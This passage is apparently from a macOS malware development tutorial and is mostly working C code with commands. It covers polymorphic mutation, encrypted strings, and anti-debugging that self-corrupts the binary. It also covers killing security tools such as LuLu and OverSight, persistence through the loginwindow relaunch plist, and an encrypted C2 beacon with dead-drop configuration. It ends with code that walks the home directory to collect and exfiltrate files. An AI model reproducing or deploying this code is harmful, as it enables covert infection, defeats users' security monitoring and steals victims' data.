The most frequent mutations are all opcode swaps within the same instruction class: add <-> xor, adc <-> xor, sbb <-> xor. This is the engine’s primary and most common transformation, just like we talked about. Simple, safe, and super effective at changing the byte signature. The order and frequency of these top mutations shift between runs. First run, cmp -> int1 led the pack; second run, add <-> xor took over. That’s the ChaCha20 RNG doing its thing, making different stochastic choices each run.

and some nonsensical int1, stc, cli, hlt) these could crash the if executed but since it’s CMP whose result is never used. A few other weird things pop up too stuff like:

clc -> {fsubr dword ptr [rsi], sti, enter 0x2f, 0, ...} in 18 different forms.
ret 0x8d48 -> {retf, ret, loopne 0x..., ror byte ptr [rax - 0x73], 0x3d}

A single input instruction can turn into tons of different outputs. Take clc (clear carry flag) it’s a single-byte opcode (0xF8) with simple semantics. The engine can swap it with other instructions or sequences that also clear the carry flag (clc itself is idempotent, or add rax, 0 also clears CF), or even toss in a junk instruction if the flag state doesn’t matter. The ret mutations show the engine can mutate instructions with operands into complex, multi-byte junk sequences too.

mov bl, 0x83 - 212 times. Instructions loading values into the low byte of rbx.
xor eax, dword ptr [rax] - 120 times. That’s the output of the add -> xor rule.
ror byte ptr [rax - 0x73], 0x3d - 99 times.

So it’s no longer just theory we actually mutate. You might spot a few “patterns,” but not really, since each run churns out diverse, multi-form mutations.

Anti-Analysis

Now let’s talk anti-stuff, as if the above wasn’t enough. This topic could fill its own article, but I’ll just hit the basics here, then we’ll move on to the malware capabilities, Anti-analysis techniques are pretty consistent across operating systems; only the implementation details change. In Part One, we covered classic stealth moves like process injection, in-memory execution, and even wrote our own versions. Remember how we hardcoded everything strings, file paths, C2 addresses? Yeah, that needs to change. Let’s look at some better options.

Instead of hardcoding strings, we can dynamically generate them at runtime by concatenating smaller fragments or assembling them based on certain conditions. It does make the code messier, sure. Alternative? Encryption, dude.

You might start simple with XOR. But since XOR is easily reversible, it’s smarter to mix it with other methods. For example, encrypt the strings with AES. Just remember: if your decryption key is hardcoded into the binary, you basically did nothing.

Even with encryption, the malware still has to decode and decrypt strings to actually use them like when it needs to connect to its C2 server for instructions. That’s the catch: you can just let the malware run and catch the decrypted C2 address when it tries to connect.

To show this, I threw together a basic AES encryption and decryption routine using tiny-AES-c. For encryption, I set up the AES context with a fixed key and processed the input string in 16-byte blocks, dumping the output into a buffer. Decryption is just the same in reverse, using the same key to get back the original data. Pretty basic, yeah but now let’s toss it into a debugger and watch where the decrypted string shows up.

The play is simple: pause the malware right after it tries to decrypt a string and dig into its memory.

(lldb) image lookup -s decrypt
spit`decrypt: 0x100002140
(lldb) breakpoint set --name decrypt
Breakpoint 1: address = 0x100002140

(lldb) r
Encrypted: 16 90 bc 53 eb 9c 8a 8b db 04 a1 81 ca b9 47 ad
* thread #1, stop reason = breakpoint 1.1
frame #0: 0x100002140 spit`decrypt

(lldb) register read rsi
     rsi = 0x7ff7bfeff820
(lldb) x/16xb $rsi
0x7ff7bfeff820: 66 6f 6f 2d 6f 70 65 72 61 74 6f 72 2d 73 65 72

(lldb) continue
Decrypted: foo-operator-server

I set a breakpoint in the decrypt function to track the decryption process. First, I ran image lookup -s decrypt to find the memory address of the function because I already knew the target. In a real-world binary, this step comes after static analysis, since most binaries won’t have symbols at this stage. Anyway, it showed up at 0x0000000100002140. Then, I set a breakpoint with breakpoint set --name decrypt, so execution halts whenever we hit that function. Running the program (r) paused it right at the breakpoint, giving me a chance to check out the registers and memory.

For example, the instruction pointer (rip) confirmed we were at the start of the decryption routine. I also peeked at the memory at the address pointed to by rsi (using x/16xb $rsi), which was all zeros at first meaning the decrypted data hadn’t been written yet. After continuing with continue, the decrypted string foo-operator-server appeared.

This setup was done to show how it works in the debugger, but the idea is the same in a dynamic analysis. You could also hook up a network monitor to passively recover the previously encrypted address of the C2 server when the malware beacons out for tasking. You can achieve similar results with a debugger, Remember ? Objective-See, yea the same.

Speaking of Objective-See tools, the easiest way to deal with them is just killing the process or suspending it if it respawns. I’d love to dig into their source especially Lulu to see if there’s some way to mess with network monitoring or something, but honestly, no point. I’ll keep it simple and not hand anything out. Plus, I actually love these tools and use them all the time, so skiddy, fuck off.

+-------------------+
|      Start        |
+-------------------+
         |
         v
+-------------------+
|  Anti-Debug Check |
+-------------------+
         |
   [Debugger?]
    /      \
  Yes      No
  |         |
  v         v           Later on:
[Self-Destruct]   +----------------------+
                  | Objective-See Check |
                  +----------------------+
                          |
                    [Detected?]
                    /        \
                 Yes         No
                 |            |
                 v            v
           [Kill'em all]   +------------------+
                           |   Main Routine   |
                           +------------------+

We’ve already got crypto at hand, doing symmetric cryptography on a payload. It’s basically a wrapper around AES, letting us encrypt or decrypt, so that’s what we’re gonna use.

__attribute__((always_inline))
size_t crypt_payload(const int mode,
   const uint8_t * key,
      const uint8_t * iv,
         const uint8_t * src,
            uint8_t * dst,
            const size_t size) {
   CCCryptorRef ctx;
   CCCryptorStatus status = CCCryptorCreate(mode ? kCCEncrypt : kCCDecrypt,
      kCCAlgorithmAES,
      kCCOptionPKCS7Padding,
      key, KEY_SIZE,
      iv, & ctx);
   if (status != kCCSuccess)
      return 0;

   size_t written = 0;
   size_t max_out = size + IV_SIZE;

   status = CCCryptorUpdate(ctx, src, size, dst, max_out, & written);
   if (status != kCCSuccess) {
      CCCryptorRelease(ctx);
      return 0;
   }

   size_t finalWritten;
   status = CCCryptorFinal(ctx, dst + written, max_out - written, & finalWritten);
   if (status != kCCSuccess) {
      CCCryptorRelease(ctx);
      return 0;
   }

   written += finalWritten;
   CCCryptorRelease(ctx);
   return written;
}

So we’re gonna use it to stash a bunch of strings as encrypted byte arrays call it the vault. This vault’s got watchlist app names like lulu, oversight, root paths for apps (launchDaemons, launchAgents), and some keys/templates for encrypted payloads. All decrypted at runtime with a hardcoded key and IV. Don’t ask me how I know.

Once paths are decrypted, it checks if a file exists there, appends the target name, and checks again. Basically, it sees if a process is allowed to exist based on the paths. To actually kill stuff, it grabs all running PIDs and full paths. If a process path matches a target app name, it checks the watchlist. If it’s not allowed, Bingo SIGKILL sent. Simple and loud.

Initial process scan...
[DEBUG] LuLu is running
[DEBUG] OverSight is running
[DEBUG] KnockKnock is running
Monitoring Objective-See processes...
[!] Process 'LuLu' has been killed or exited!
[!] Process 'OverSight' has been killed or exited!
[!] Process 'KnockKnock' has been killed or exited!

And just like that, problem solved… kinda ;) The first thing that runs once the binary starts is a function marked with the “constructor” attribute. Most debuggers start at main(), so we exploit this by running code before main() even kicks in. Makes it way harder for analysts to catch anti-debugging checks.

__attribute__((constructor))void _entry() {}

GCC’s ((constructor))

The most known and simple technique for BSD-based systems is the one I’m rollin’ with, and to show you a little obfuscation and dynamic symbol resolution along the way check this out,

__attribute__((always_inline)) static inline int Psys(int * mib, struct kinfo_proc * info, size_t * size) {
  sysctl_func_t sysptr = getsys();
  if (!sysptr) return -1;
  return sysptr(mib, 4, info, size, NULL, 0);
}

__attribute__((always_inline)) static bool De(void) {
  int mib[4];
  struct kinfo_proc info;
  size_t size = sizeof(info);

  memset( & info, 0, sizeof(info));

  mib[0] = CTL_KERN;
  mib[1] = KERN_PROC;
  mib[2] = KERN_PROC_PID;
  mib[3] = getpid();

  if (Psys(mib, & info, & size) != 0) return false;
  return Se( & info);
}

__attribute__((constructor))
static void Dee(void) {
  if (De()) {
    puts("See U!\n");
  }
}

If you picked up on it, you’ll notice we don’t call the sysctl function directly that’s the first thing static analysis tools zero in on. Instead of embedding the string "sysctl" directly in the binary, we use some arithmetic and bitwise operations. In our gctl() function, we take a couple of numbers (like 230/2, 242/2, …) that actually represent the ASCII codes for the letters in "sysctl".

We then XOR those with a key generated from the process ID and current time. Later, we use the same key again to retrieve the "sysctl" string. After that, we resolve its address using dlsym(). In the getsys() function, we call gctl() to decode and “deobfuscate” it. Pretty simple stuff: CTL_KERN, KERN_PROC, KERN_PROC_PID, but it hides the sysctl call from static analysis.

Up to now, if you haven’t noticed, our program prints "see" or "whatever" when it’s not being traced, and "being traced" otherwise. In the real world, the “not being traced” message gets swapped with whatever activity you’re trying to hide, while “being traced” shows fake stuff to trick a reverser into thinking that’s the real behavior. Normally, the app runs as usual, leaving minimal traces for auto-destruction (more on that later). > ReverseMe

Or even better, for fun when a debugger is triggered, pop up the classic “This program isn’t compatible with your device” message. Clicking “OK” triggers a self-corruption mechanism.

void self_modify() {
   int fd = -1;
   struct stat st;
   char path[PATH_MAX];
   uint32_t path_size = sizeof(path);

   if (_NSGetExecutablePath(path, & path_size) != 0) return;

   fd = open(path, O_RDWR);
   if (fd == -1) {
      return;
   }
   if (fstat(fd, & st) == -1) {
      close(fd);
      return;
   }

   void * mapped = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
   if (mapped == MAP_FAILED) {
      close(fd);
      return;
   }

   struct mach_header_64 * header = (struct mach_header_64 * ) mapped;
   if (header -> magic != MH_MAGIC_64) {
      goto cleanup;
   }

   uint8_t key[KEY_SIZE];
   uint8_t iv[IV_SIZE];
   if (CCRandomGenerateBytes(key, KEY_SIZE) != kCCSuccess) {
      goto cleanup;
   }
   if (CCRandomGenerateBytes(iv, IV_SIZE) != kCCSuccess) {
      goto cleanup;
   }

   // Find __text section 
   uint64_t text_start, text_end, vm_start, vm_end;
   find_text(header, & text_start, & text_end, & vm_start, & vm_end);
   uint64_t current_func_offset = get_offset(header, (void * ) patcher);

   uint64_t _start = text_start;
   uint64_t _end = text_end;

   if (current_func_offset > 0) {
      _start = current_func_offset;
      _end = current_func_offset + 0x2000; // 8KB
      if (_end > st.st_size) _end = st.st_size;
   }

   uint8_t * encryption_buffer = malloc(st.st_size + kCCBlockSizeAES128);
   if (!encryption_buffer) {
      goto cleanup;
   }

   // Encrypt before exclusion
   if (_start > 0) {
      size_t pre_size = _start;
      crypt_payload(1, key, iv, (uint8_t * ) mapped, encryption_buffer, pre_size);
      memcpy(mapped, encryption_buffer, pre_size);
   }

   // Encrypt after exclusion
   if (_end < st.st_size) {
      size_t post_size = st.st_size - _end;
      crypt_payload(1, key, iv, (uint8_t * ) mapped + _end, encryption_buffer, post_size);
      memcpy((uint8_t * ) mapped + _end, encryption_buffer, post_size);
   }

   free(encryption_buffer);
   msync(mapped, st.st_size, MS_SYNC);

   cleanup:
      if (mapped != MAP_FAILED) munmap(mapped, st.st_size);
   if (fd != -1) close(fd);

   memset(key, 0, KEY_SIZE);
   memset(iv, 0, IV_SIZE);
   __asm__ __volatile__("":: "r"(key), "r"(iv): "memory");
}

Overall, combining these techniques does a pretty good job of concealing its presence. It’s the simplest approach a reverser could just patch it and move on. That’s why this piece must be extremely careful to avoid detection for as long as possible. The trick is to strike a balance: don’t make the code so complex that it’s impossible to tell what’s what (for you as developer), but also not too simple that it gives away everything. We’ve blended it all into one piece of art.

Another trick we used is checking where the piece is running. Using _NSGetExecutablePath, the process first determines where it’s running because its behavior depends on context. Unlike Windows, which uses environment variables to manage this, macOS relies on system calls to fetch runtime information.

On Linux, getting an app’s absolute path is easy just query /proc/self/exe. But on macOS, the trick lies in how the Darwin kernel places the executable path on the process stack right after the envp array when it creates the process. The dynamic link editor, dyld, grabs this during initialization and keeps a pointer to it. This function uses that pointer to find the path.

In C/C++, when we interact with OS-level functions like this, we need to allocate enough memory for the information the system will retrieve and store for us.

if (_NSGetExecutablePath(execPath, &pathSize) != 0)
	return;

One reason for this design is the nature of the infection itself. We assume the target will run the malware from the ~/Downloads directory, or at least we hope they do. It’s a simple anti-analysis trick, but we don’t want to make things too easy for the analyst.

Still, it kind of works, because if you require certain conditions for the payload (or whatever) to be decrypted and executed, those conditions must be met. This makes it much harder for someone trying to analyze your binary they’d have to emulate the environment (or trick it into thinking it is the correct environment), which can be so challenging.

Obfuscation is just as important as the code itself, and RE often goes hand in hand with malware development.

Persistence

There’s a great blog series called Beyond Good Ol’ LaunchAgents that dives into various persistence techniques yep, it goes way beyond your run-of-the-mill LaunchAgents. Before we jump back into our piece and talk about how we implemented our persistence, let’s talk about macOS persistence. I tried to cover this in the first part, but I only scratched the surface and ran through some basic tricks that might not even work on today’s systems. So, let’s take another crack at it.

So we got LaunchAgents and LaunchDaemons handling auto-managed processes. LaunchAgents usually live in ~/Library/LaunchAgents for user-specific tasks, kicking in when a user logs in. LaunchDaemons, on the other hand, sit in /Library/LaunchDaemons and fire up at system startup.

LaunchAgents mostly run in user sessions, but you’ll also see them in system dirs like /System/Library/LaunchAgents, which need elevated privileges and usually end up in /Library/LaunchDaemons.

LaunchAgents are for tasks that need user interaction, while LaunchDaemons are built for background services.

So what are we aiming for here? macOS stores info about apps that should automatically reopen when a user logs back in after a restart or logout. Basically, the apps open at shutdown get saved into a list that macOS checks at the next login. The preferences for this system are tucked away in a property list (plist) file that’s specific to each user and UUID.

You’ll find the plist at ~/Library/Preferences/ByHost/com.apple.loginwindow.<UUID>.plist and that <UUID> is tied to the specific hardware of your Mac. Now, you might be wondering how this ties into persistence. Since plist files in a user’s ~/Library directory are writable by that user, we can just… well, exploit that. And because macOS inherently uses this feature to launch legit applications, it trusts the com.apple.loginwindow plist as a bona fide system feature.

#include <CoreFoundation/CoreFoundation.h>
#include <mach-o/dyld.h>

// persistence entry.
void update(const char *plist_path) {
    uint32_t bufsize = 0;
    _NSGetExecutablePath(NULL, &bufsize); 
    char *exePath = malloc(bufsize);
    if (!exePath || _NSGetExecutablePath(exePath, &bufsize) != 0) {
        free(exePath);
        return;
    }

    CFURLRef fileURL = CFURLCreateFromFileSystemRepresentation(NULL,
                                    (const UInt8 *)plist_path, strlen(plist_path), false);
    CFPropertyListRef propertyList = NULL;
    CFDataRef data = NULL;

    if (CFURLCreateDataAndPropertiesFromResource(NULL, fileURL, &data, NULL, NULL, NULL)) {
        propertyList = CFPropertyListCreateWithData(NULL, data,
                        kCFPropertyListMutableContainers, NULL, NULL);
        CFRelease(data);
    }

    // if no plist exists, make one.
    if (propertyList == NULL) {
        propertyList = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
                        &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    }

    // get (or create) the array for login items.
    CFMutableArrayRef apps = (CFMutableArrayRef)
        CFDictionaryGetValue(propertyList, CFSTR("TALAppsToRelaunchAtLogin"));
    if (!apps) {
        apps = CFArrayCreateMutable(kCFAllocatorDefault, 0, &kCFTypeArrayCallBacks);
        CFDictionarySetValue((CFMutableDictionaryRef)propertyList,
                             CFSTR("TALAppsToRelaunchAtLogin"), apps);
        CFRelease(apps);
    }

    // dictionaryir stuff
    CFMutableDictionaryRef newApp = CFDictionaryCreateMutable(kCFAllocatorDefault,
                                    3, &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);

    int state = 2;  // for now
    CFNumberRef bgState = CFNumberCreate(kCFAllocatorDefault, kCFNumberIntType, &state);
    CFDictionarySetValue(newApp, CFSTR("BackgroundState"), bgState);
    CFRelease(bgState);

    // executable's path.
    CFStringRef exePathStr = CFStringCreateWithCString(kCFAllocatorDefault, exePath,
                                    kCFStringEncodingUTF8);
    CFDictionarySetValue(newApp, CFSTR("Path"), exePathStr);
    CFRelease(exePathStr);
    CFArrayAppendValue(apps, newApp);

    // write back to disk.
    CFDataRef newData = CFPropertyListCreateData(kCFAllocatorDefault, propertyList,
                                    kCFPropertyListXMLFormat_v1_0, 0, NULL);
    if (newData) {
        FILE *plistFile = fopen(plist_path, "wb");
        if (plistFile != NULL) {
            fwrite(CFDataGetBytePtr(newData), sizeof(UInt8),
                   CFDataGetLength(newData), plistFile);
            fclose(plistFile);
        }
        CFRelease(newData);
    }

    CFRelease(newApp);
    CFRelease(propertyList);
    CFRelease(fileURL);
    free(exePath);
}

iRight, so the idea’s dead simple. The code just hijacks how macOS keeps track of apps it should spin back up after login. If the TALAppsToRelaunchAtLogin key’s already in the plist, it just drops a new entry for our program so the system knows to fire it up next time. If the key’s missing, no biggie it creates it from scratch and seeds it with a fresh entry.

That entry ain’t just filler it’s got the full path to the binary, a BackgroundState flag so it runs quiet in the back, and the BundleID so macOS treats it like a legit app. Once that’s baked in, the updated plist overwrites the original. From then on, every reboot and login, macOS reads that plist and obediently relaunches our program, no questions asked. Persistence hook, hiding in plain sight, riding the same rails real apps use to restore themselves at login.

Seems easy, right? What’s the catch? The TALAppsToRelaunchAtLogin trick was built for apps with a proper bundle, since it leans on BundleID metadata to track and relaunch them clean.

Yeah, you can still jam in a plain binary path with BackgroundState and it’ll relaunch, but it’s messy. Without a bundle, macOS doesn’t have a real identity to pin on the process. Dock icons, quarantine flags, even persistence reliability stuff gets flaky. Sure, a raw binary might still boot, but you lose the guarantees, and the plist entry sticks out if anyone checks.

With a legit bundle, though, macOS just shrugs and treats it like any other app that wants to relaunch at login. Way stealthier. That’s why you always stack multiple techniques and persistence hooks in your piece. The trick is to stay diverse but not identifiable.

Build it like a real macOS app, play by the normal rules but keep in mind, a lot can break. That’s why you always want a fallback. That’s why most macOS malware just sticks to LaunchAgents or autorun scripts ’cause it’s dead simple. So simple there’s almost no way it can go wrong.

check out: “beyond_0021/”

Phone Home

Alright, so far we’ve mutated, encrypted, thrown in some anti-analysis, and even built persistence to keep it alive. What’s next? Once everything’s in place, it’s time to confirm we’ve actually got a victim. For that, the piece needs to phone home.

In part one, we kept it simple grabbed a host profile (OS, kernel version, arch, and other juicy metadata) and shot it over a socket. Raw, unprotected. The first piece looked something like this:

// Collect system information
void sys_info(RBuff *report) {
    struct utsname u; 
    if (uname(&u) == 0) {
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[System Info]\nOS: %s\nVersion: %s\nArch: %s\nKernel: %s\n\n", u.sysname, u.version, u.machine, u.release);
    }
}

// Collect user information
void user_info(RBuff *report) {
    struct passwd *user = getpwuid(getuid()); 
    if (user) 
        report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
            "[User Info]\nUsername: %s\nHome: %s\n\n", user->pw_name, user->pw_dir);
}

// Collect network information
void net_info(RBuff *report) {
    struct ifaddrs *ifaces, *ifa; 
    if (getifaddrs(&ifaces) == 0) {
        for (ifa = ifaces; ifa; ifa = ifa->ifa_next) {
            if (ifa->ifa_addr && ifa->ifa_addr->sa_family == AF_INET) {
                char ip[INET_ADDRSTRLEN]; 
                inet_ntop(AF_INET, &((struct sockaddr_in *)ifa->ifa_addr)->sin_addr, ip, sizeof(ip));
                report->pointer += snprintf(report->buffer + report->pointer, sizeof(report->buffer) - report->pointer, 
                    "[Network Info]\nInterface: %s\nIP: %s\n\n", ifa->ifa_name, ip);
            }
        }
        freeifaddrs(ifaces);
    }
}

This is super simple and effective. We could layer in encryption and avoid sending it raw, or throw in all the extra tricks but we’re not doing that. Remember I mentioned a one-liner instead of this full Well, let’s try that and see what happens

/usr/sbin/system_profiler -nospawn -detailLevel full This cmd let you gather detailed system info OS version, hardware specs, … without needing native API calls, which has up’s and down’s yea simple, but visible and prone to notice, a simple popen can get the job done next we wanna generating a UUID for each system gives you a unique fingerprint, which make’s sense to keep track of which is which and who’s who.

Here’s how we’re gonna handle the first comms: use what we already got. Encrypt the AES key with an RSA public key, use AES for the system profile, and wrap that AES key in RSA. Now, you might think, “Why all that hassle for just host info? Just XOR it, man!” True, if we were only sending basic stuff, XOR or even base64 would be fine. But this setup sets the stage for more sensitive data later.

Remember, we’re not just grabbing host info we’ll grab files, dump the Keychain, and drop a persistence backdoor. This is the first handshake with the C2, so we cannot screw it up.

Simple implementation, let’s call it overnout

/* 0xf00sec */

#include <openssl/evp.h>
#include <openssl/rsa.h>
#include <openssl/pem.h>
#include <curl/curl.h>
#include <openssl/aes.h>
#include <openssl/rand.h>

#include <sys/stat.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/utsname.h>

#include <uuid/uuid.h>

size_t callback(void *contents, size_t size, size_t nmemb, void *userp) {
    size_t realsize = size * nmemb;
    struct Mem *mem = (struct Mem *)userp;
    char *ptr = realloc(mem->data, mem->size + realsize + 1);
    if(ptr == NULL) return 0;
    mem->data = ptr;
    memcpy(&(mem->data[mem->size]), contents, realsize);
    mem->size += realsize;
    mem->data[mem->size] = 0;
    return realsize;
}

RSA* get_rsa(const char* url) { 
    CURL *curl = curl_easy_init();
    if (!curl) return NULL;
    
    struct Mem mem;
    mem.data = malloc(1);
    mem.size = 0;
    
    curl_easy_setopt(curl, CURLOPT_URL, url);
    curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, callback);
    curl_easy_setopt(curl, CURLOPT_WRITEDATA, (void *)&mem);
    CURLcode res = curl_easy_perform(curl);
    curl_easy_cleanup(curl); 
    
    // https://curl.se/libcurl/c/curl_easy_cleanup.html
    
    if (res != CURLE_OK) {
        free(mem.data);
        return NULL;
    }
    
    BIO *bio = BIO_new_mem_buf(mem.data, mem.size);
    RSA *rsa_pub = PEM_read_bio_RSA_PUBKEY(bio, NULL, NULL, NULL);
    BIO_free(bio);
    free(mem.data);
    return rsa_pub;
}

void overn_out(const char *server_url, const char *data, size_t size) { 
    CURL *curl = curl_easy_init();
    if (!curl) return;
    
    struct curl_slist *headers = NULL;
    headers = curl_slist_append(headers, "Content-Type: application/octet-stream");
    
    curl_easy_setopt(curl, CURLOPT_URL, server_url);
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, size);
    CURLcode res = curl_easy_perform(curl);
    
    curl_slist_free_all(headers);
    curl_easy_cleanup(curl);
}

void profiler(char *buffer, size_t *offset) {
    FILE *fp;
    char line[1035];

    fp = popen("system_profiler SPSoftwareDataType SPHardwareDataType", "r");
    if (fp == NULL) {
        return;
    }

    *offset += snprintf(buffer + *offset, B - *offset, "[Info]\n");
    while (fgets(line, sizeof(line), fp) != NULL) {
        *offset += snprintf(buffer + *offset, B - *offset, "%s", line);
    }
    fclose(fp);
}


void id(char *id) {uuid_t uuid;
    uuid_generate_random(uuid);uuid_unparse(uuid, id);}

void sendprofile() {
	// assign or NULL*
    const char *prime; // REMOTE_C2
    const char *p_key; // KEY
    
    char buff[B] = {0};
    size_t Pio = 0;
    char system_id[37];
    
    // system ID.
    id(system_id);
    
    Pio += snprintf(buff + Pio, sizeof(buff) - Pio, "ID: %s\n", system_id);
    Pio += snprintf(buff + Pio, sizeof(buff) - Pio, "=== Host ===\n");
    profiler(buff, &Pio);
    
    unsigned char aes_key[16];
    if (!RAND_bytes(aes_key, sizeof(aes_key))) {
        // die
        return;
    }
    
    unsigned char iv[AES_BLOCK_SIZE];
    if (!RAND_bytes(iv, AES_BLOCK_SIZE)) {
         // die
        return;
    }
    
    // https://wiki.openssl.org/index.php/EVP_Authenticated_Encryption_and_Decryption
    unsigned char ciphertext[B + AES_BLOCK_SIZE];
    int ciphertext_len = 0;
    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    if (!ctx) {
        // die
        return;
    }
    if (1 != EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, aes_key, iv)) {
        EVP_CIPHER_CTX_free(ctx);
        return;
    }
    int len = 0;
    if (1 != EVP_EncryptUpdate(ctx, ciphertext, &len, (unsigned char*)buff, Pio)) {
        EVP_CIPHER_CTX_free(ctx);
        return;
    }
    ciphertext_len = len;
    int final_len = 0;
    if (1 != EVP_EncryptFinal_ex(ctx, ciphertext + len, &final_len)) {
        EVP_CIPHER_CTX_free(ctx);
        return;
    }
    ciphertext_len += final_len;
    EVP_CIPHER_CTX_free(ctx);
    
    // get the server's RSA public key 
    RSA *rsa_pub = get_rsa(p_key);
    if (!rsa_pub) {
        // die - should auto-destruct
        return;
    }
    
    // encrypt the AES key using the RSA public key 
    int rsa_size = RSA_size(rsa_pub);
    unsigned char *encrypted_key = malloc(rsa_size);
    if (!encrypted_key) {
        RSA_free(rsa_pub);
        return;
    }
    int encrypted_key_len = RSA_public_encrypt(sizeof(aes_key), aes_key, encrypted_key,
                                                 rsa_pub, RSA_PKCS1_OAEP_PADDING);
    if (encrypted_key_len == -1) {
        free(encrypted_key);
        RSA_free(rsa_pub);
        return;
    }
    RSA_free(rsa_pub);
    
    // package 
    int message_len = 4 + encrypted_key_len + AES_BLOCK_SIZE + 4 + ciphertext_len;
    unsigned char *message = malloc(message_len);
    if (!message) {
        free(encrypted_key);
        return;
    }
    unsigned char *p = message;
    uint32_t ek_len_net = htonl(encrypted_key_len);
    memcpy(p, &ek_len_net, 4);
    p += 4;
    memcpy(p, encrypted_key, encrypted_key_len);
    p += encrypted_key_len;
    free(encrypted_key);
    // Write the IV.
    memcpy(p, iv, AES_BLOCK_SIZE);
    p += AES_BLOCK_SIZE;
    // length.
    uint32_t ct_len_net = htonl(ciphertext_len);
    memcpy(p, &ct_len_net, 4);
    p += 4;
    memcpy(p, ciphertext, ciphertext_len);
    
    // send the message
    overn_out(prime, (const char*)message, message_len);
    free(message);
}

Remember malware’s still just software. You can’t leave static C2 info lying around (see that anti-analysis section?). If it’s exposed, it’s game over for both the malware and you. That’s why you always want a kill switch, and make damn sure it can’t be flipped against your own piece.

Here’s how the whole dance goes: hit a dead-drop URL (encrypted in the vault like everything else), pull down what looks like garbage, but isn’t. It’s structured line one has the RSA public key, line two has the actual C2. Clean separation. If something blows up, no need to patch binaries just update the paste and keep rolling. The parsing is dead simple, grab line 1 for the pubkey URL, line 2 for C2. Strip whitespace because you know someone’s gonna fuck up the formatting.

And yeah, we wrap everything in encryption. Fresh AES key, payload goes AES-CBC, then wrap that key with RSA. Wire format’s tidy length-prefixed encrypted key, IV, then length-prefixed encrypted payload. Network byte order ’cause we ain’t animals. The C2 just RSA-decrypts the key, then AES-decrypts the payload. Simple on both ends.

unsigned char* wrap_loot(const unsigned char *plaintext, size_t plaintext_len, 
                        size_t *out_len, RSA *rsa_pubkey) {
    unsigned char aes_key[16], iv[BLOCK_SIZE];
    if (!RAND_bytes(aes_key, sizeof(aes_key)) || !RAND_bytes(iv, BLOCK_SIZE))
        return NULL;

    // AES encrypt the payload
    int max_ct = plaintext_len + BLOCK_SIZE;
    unsigned char *ciphertext = malloc(max_ct);
    EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
    EVP_EncryptInit_ex(ctx, EVP_aes_128_cbc(), NULL, aes_key, iv);
    
    int len_ct = 0, final_ct = 0;
    EVP_EncryptUpdate(ctx, ciphertext, &len_ct, plaintext, plaintext_len);
    EVP_EncryptFinal_ex(ctx, ciphertext + len_ct, &final_ct);
    EVP_CIPHER_CTX_free(ctx);
    int ciphertext_len = len_ct + final_ct;

    // RSA encrypt the AES key
    int rsa_size = RSA_size(rsa_pubkey);
    unsigned char *encrypted_key = malloc(rsa_size);
    int ek_len = RSA_public_encrypt(sizeof(aes_key), aes_key, encrypted_key, 
                                   rsa_pubkey, RSA_PKCS1_OAEP_PADDING);

    // Package it all up: [key_len][encrypted_key][iv][data_len][encrypted_data]
    *out_len = 4 + ek_len + BLOCK_SIZE + 4 + ciphertext_len;
    unsigned char *message = malloc(*out_len);
    
    unsigned char *p = message;
    uint32_t net = htonl(ek_len);
    memcpy(p, &net, 4); p += 4;
    memcpy(p, encrypted_key, ek_len); p += ek_len;
    memcpy(p, iv, BLOCK_SIZE); p += BLOCK_SIZE;
    net = htonl(ciphertext_len);
    memcpy(p, &net, 4); p += 4;
    memcpy(p, ciphertext, ciphertext_len);

    free(encrypted_key);
    free(ciphertext);
    return message;
}

The first handshake with home profiles the target system. Uses system_profiler to dump hardware and software basically everything you wanna know about the environment then slaps a UUID on the victim, wraps all that system info in crypto, and ships it off. Gives us a clean profile before any file exfil even starts.

void collectSystemInfo(RSA *rsaPubKey) {
    char buff[PAGE_SIZE]={0};
    size_t offset = 0;
    char system_id[37];
    mint_uuid(system_id);
    
    offset += snprintf(buff+offset, sizeof(buff)-offset, _strings[6], system_id);
    offset += snprintf(buff+offset, sizeof(buff)-offset, _strings[7]);
    profiler(buff,sizeof(buff),&offset);

    size_t packaged_len = 0;
    unsigned char *packaged = wrap_loot((unsigned char*)buff, offset, &packaged_len, rsaPubKey);
    if (packaged) {
        overn_out(C2_ENDPOINT, packaged, packaged_len);
        free(packaged);
    }
}

There’s two ways to handle the next step:

mdfind "kMDItemLastUsedDate >= \$time.today(-7)" -onlyin ~
Basically, query Spotlight for recently used files. kMDItemLastUsedDate tracks the last time a file was opened. You can call this via NSTask or NSMetadataQuery.

Then either use whatever directories you get there and start scanning, or go the hard way. Once comms are locked in, it shifts gears: profiles the system in detail and starts exfiltrating target files. or just walks the home directory hunting for anything interesting docs, PDFs, text files. The ALLOWED array keeps it focused, so it doesn’t just hoover up every .DS_Store lying around.

I’m only interested in cat pics at the moment.

const char *ALLOWED[] = { "png","jpeg","jpg",NULL };

int fileCollector(const char *fpath, const struct stat *sb, int typeflag, struct FTW *ftwbuf) {
    if (fileCount >= MAX_FILES) return 0;
    if (typeflag == FTW_F && sb->st_size > 0) {
        const char *ext = strrchr(fpath, '.');
        if (ext && ext != fpath) {
            ext++;
            for (int i=0; ALLOWED[i]; i++){
                if (strcasecmp(ext, ALLOWED[i])==0){
                    char dst[512]={0};
                    snprintf(dst,sizeof(dst),"%s/%s", tmpDirectory, basename(fpath));
                    if (copyFile(fpath,dst)==0) {
                        file_t *o = malloc(sizeof(file_t));
                        o->path = strdup(dst);
                        o->size = sb->st_size;
                        files[fileCount++] = o;
                    }
                    break;
                }
            }
        }
    }
    return 0;
}

We copies everything to a temp directory first, then tars it up. keeps the original files untouched so the user doesn’t notice missing documents. The whole collection gets compressed with zlib before encryption, which is crucial when you’re exfiltrating potentially massive document collections over HTTP.

The whole thing is pretty simple

Hit the dead drop, parse out C2 config
Grab the RSA public key from the specified URL
Send system profile to establish the session
Walk the filesystem collecting interesting files
Tar + compress + encrypt the whole collection
